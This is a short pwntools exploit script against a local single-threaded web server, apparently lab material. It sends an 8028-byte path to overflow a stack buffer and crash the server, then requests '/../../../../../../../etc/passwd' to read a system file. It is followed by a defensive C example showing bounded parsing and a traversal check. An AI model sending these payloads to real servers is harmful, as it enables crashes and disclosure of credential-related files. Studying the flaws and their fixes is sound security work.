exploit.py
'''
A simple script to exploit a buffer overflow and a local file inclusion in the given
single-threaded server. This script will cause the server to crash.
Since the stack canary is turned on by default, the buffer overflow will overwrite
the stack canary, causing the server to detect an overflow. If an attacker can
somehow get the server binary and there is a format string vulnerability, they can
combine the two to get remote code execution.
The buffer overflow is mitigated in the latest code by using bounds on variables.
'''
from pwn import remote

# Constants
host = "127.0.0.1"
port = 8081

r = remote(host, port)

# Buffer overflow: an over-long request path (8028 bytes of filler)
# pwntools tubes take bytes, so the request line is encoded before it is sent
payload = "/" + "A" * 8028
r.sendline("GET {} HTTP/1.1".format(payload).encode())
r.sendline(b"\r\n")

# Local file inclusion: path traversal out of the document root
payload = "/../../../../../../../etc/passwd"
r.sendline("GET {} HTTP/1.1".format(payload).encode())
r.sendline(b"\r\n")

r.interactive()
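The docstring says the overflow was fixed with bounds on variables; the following added C example (not the repository's server code, which is not on this page) shows what that fix looks like on the receiving side: a bounded request-line parser that refuses over-long paths before copying them, plus a lexical check that rejects the `/../` traversal the LFI request relies on. The names parse_request_path, path_escapes_root and MAX_PATH_LEN are assumptions.

```c
/* Added example, not the target server's code. Assumed names throughout. */
#include <string.h>

#define MAX_PATH_LEN 1024   /* assumed bound; the real server's limit is unknown */

/* Returns 1 if the URL path, resolved lexically segment by segment, climbs
 * above "/" (as "/../../../../../../../etc/passwd" does), otherwise 0.
 * Done on the text so no file has to exist for the check to run. */
static int path_escapes_root(const char *path)
{
    int depth = 0;
    const char *p = path;
    while (*p) {
        while (*p == '/') p++;               /* skip separators, including "//" */
        const char *seg = p;
        while (*p && *p != '/') p++;
        size_t len = (size_t)(p - seg);
        if (len == 2 && seg[0] == '.' && seg[1] == '.') {
            if (--depth < 0) return 1;       /* one ".." more than we descended */
        } else if (len > 0 && !(len == 1 && seg[0] == '.')) {
            depth++;                         /* ordinary segment; "." is ignored */
        }
    }
    return 0;
}

/* Copies the path out of a "GET <path> HTTP/1.x" request line into out
 * (capacity outsz). Returns 0 on success, -1 if the line is malformed, the
 * path is longer than the buffer or MAX_PATH_LEN, or it escapes the root.
 * The length is checked before the copy, so an 8028-byte path is dropped
 * rather than written past the end of a fixed-size stack buffer. */
int parse_request_path(const char *line, char *out, size_t outsz)
{
    if (strncmp(line, "GET ", 4) != 0) return -1;
    const char *start = line + 4;
    const char *end = strchr(start, ' ');
    if (!end) return -1;
    size_t len = (size_t)(end - start);
    if (len == 0 || len >= outsz || len > MAX_PATH_LEN) return -1;
    memcpy(out, start, len);
    out[len] = '\0';
    return path_escapes_root(out) ? -1 : 0;
}
```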